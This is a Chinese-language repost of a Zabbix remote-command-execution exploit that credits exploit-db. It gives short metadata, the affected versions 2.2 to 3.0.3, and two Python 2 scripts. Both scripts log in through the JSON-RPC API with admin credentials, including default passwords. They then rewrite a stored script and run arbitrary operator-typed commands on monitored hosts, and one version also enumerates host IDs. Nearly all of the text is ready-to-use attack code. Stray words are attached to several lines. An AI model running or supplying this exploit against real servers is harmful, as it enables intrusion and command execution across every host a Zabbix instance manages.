漏洞來源: https://www.exploit-db.com/exploits/39937/php
***成本:高python
危害程度:低(此洞須要密碼)
json
利用條件: 須要高權限用戶登陸api
影響範圍:2.2 < 3.0.3app
tips:
python2.7
此洞須要你拿到高權限的帳戶密碼,當你拿到帳戶密碼以後,進入後臺也能夠執行命令,利用API JSON-RPC爲第二種方案。ide
此exp並非很完美,由於不會自動獲取hostid。post
#!/usr/bin/env python # -*- coding: utf-8 -*- # Exploit Title: Zabbix RCE with API JSON-RPC # Date: 06-06-2016 # Exploit Author: Alexander Gurin # Vendor Homepage: http://www.zabbix.com # Software Link: http://www.zabbix.com/download.php # Version: 2.2 - 3.0.3 # Tested on: Linux (Debian, CentOS) # CVE : N/A import requests import json import readline ZABIX_ROOT = 'http://192.168.66.2' ### Zabbix IP-address url = ZABIX_ROOT + '/api_jsonrpc.php' ### Don't edit login = 'Admin' ### Zabbix login 帳戶 password = 'zabbix' ### Zabbix password 密碼 hostid = '10084' ### Zabbix hostid 須要指定命令的主機 ### auth payload = { "jsonrpc" : "2.0", "method" : "user.login", "params": { 'user': ""+login+"", 'password': ""+password+"", }, "auth" : None, "id" : 0, } headers = { 'content-type': 'application/json', } auth = requests.post(url, data=json.dumps(payload), headers=(headers)) auth = auth.json() while True: cmd = raw_input('\033[41m[zabbix_cmd]>>: \033[0m ') if cmd == "" : print "Result of last command:" if cmd == "quit" : break ### update payload = { "jsonrpc": "2.0", "method": "script.update", "params": { "scriptid": "1", "command": ""+cmd+"" }, "auth" : auth['result'], "id" : 0, } cmd_upd = requests.post(url, data=json.dumps(payload), headers=(headers)) ### execute payload = { "jsonrpc": "2.0", "method": "script.execute", "params": { "scriptid": "1", "hostid": ""+hostid+"" }, "auth" : auth['result'], "id" : 0, } cmd_exe = requests.post(url, data=json.dumps(payload), headers=(headers)) cmd_exe = cmd_exe.json() print cmd_exe["result"]["value"]
修改版本 自動獲取hostidui
#!/usr/bin/env python2.7 #coding=utf-8 import json import requests url = "http://x.x.x.x/api_jsonrpc.php" header = {"Content-Type": "application/json"} username = 'admin' password = 'admin888' #get auth id payload = { "jsonrpc" : "2.0", "method" : "user.login", "params": { 'user': ""+username+"", 'password': ""+password+"", }, "auth" : None, "id" : 0, } headers = { 'content-type': 'application/json', } auth = requests.post(url, data=json.dumps(payload), headers=(headers)) auth = auth.json() #get hostid data = { "jsonrpc":"2.0", "method":"host.get", "params":{ "output":["hostid","name"], "filter":{"host":""} }, "auth":""+auth['result']+"", "id":1, } hostid = requests.post(url, data=json.dumps(data), headers=(headers)) hostid = hostid.json() print 'uid\tname' for hid in hostid['result']: print hid['hostid'],hid['name'] #exec command hostid = raw_input('\033[41m[input_hostid]>>: \033[0m ') while True: cmd = raw_input('\033[41m[zabbix_cmd]>>: \033[0m ') if cmd == "" : print "Result of last command:" if cmd == "quit" : break ### update payload = { "jsonrpc": "2.0", "method": "script.update", "params": { "scriptid": "1", "command": ""+cmd+"" }, "auth" : auth['result'], "id" : 0, } cmd_upd = requests.post(url, data=json.dumps(payload), headers=(headers)) ### execute payload = { "jsonrpc": "2.0", "method": "script.execute", "params": { "scriptid": "1", "hostid": ""+hostid+"" }, "auth" : auth['result'], "id" : 0, } cmd_exe = requests.post(url, data=json.dumps(payload), headers=(headers)) cmd_exe = cmd_exe.json() print cmd_exe["result"]["value"] if cmd == 'quit': break